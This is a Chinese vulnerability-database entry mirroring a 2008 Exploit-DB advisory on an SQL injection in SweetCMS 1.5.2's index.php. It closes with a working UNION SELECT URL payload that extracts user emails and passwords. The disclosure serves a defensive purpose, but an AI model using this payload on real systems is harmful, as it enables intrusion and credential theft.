SweetCMS 1.5.2 - 'index.php' SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056907 漏洞类型
发布时间 2008-10-14 更新时间 2008-10-14
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/32490
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/31774/info

SweetCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

SweetCMS 1.5.2 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?page=3+AND+1=2+UNION+SELECT+0,concat(email,0x3a,password),2,3,4,5+from+users+limit+1,1--